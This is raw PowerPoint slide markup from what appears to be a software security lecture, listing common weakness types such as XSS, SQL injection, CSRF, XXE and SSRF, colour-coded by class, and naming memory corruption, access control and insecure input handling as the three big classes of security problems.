              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Out-of-bounds Read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Improper Input  Validation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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS command injection                    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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use After Free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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Path traversal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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unrestricted Upload of File with Dangerous Type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sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Missing Authentication for Critical Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                           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US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer Overflow or Wraparound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="1124744"/>
            <a:ext cx="4034606" cy="5040560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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL Pointer Dereference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Use of Hard-coded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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Incorrect Default Permissions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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected Credentials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Incorrect Permission Assignment for Critical Resource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US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="15"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{312E1EBE-BC53-B26A-777E-87A6DAE3B694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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{203D43D3-408D-4D7A-B290-7A4D7FA16B86}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50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2111929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07A57B-BD83-DB78-666C-5F7D56FD6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 three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D71A705-78C5-A8EC-322E-FE88EA48C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big three classes of security problems are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memory corruption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8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incl.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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authentication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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insecure input handling</a:t>
            </a:r>
            <a:r>
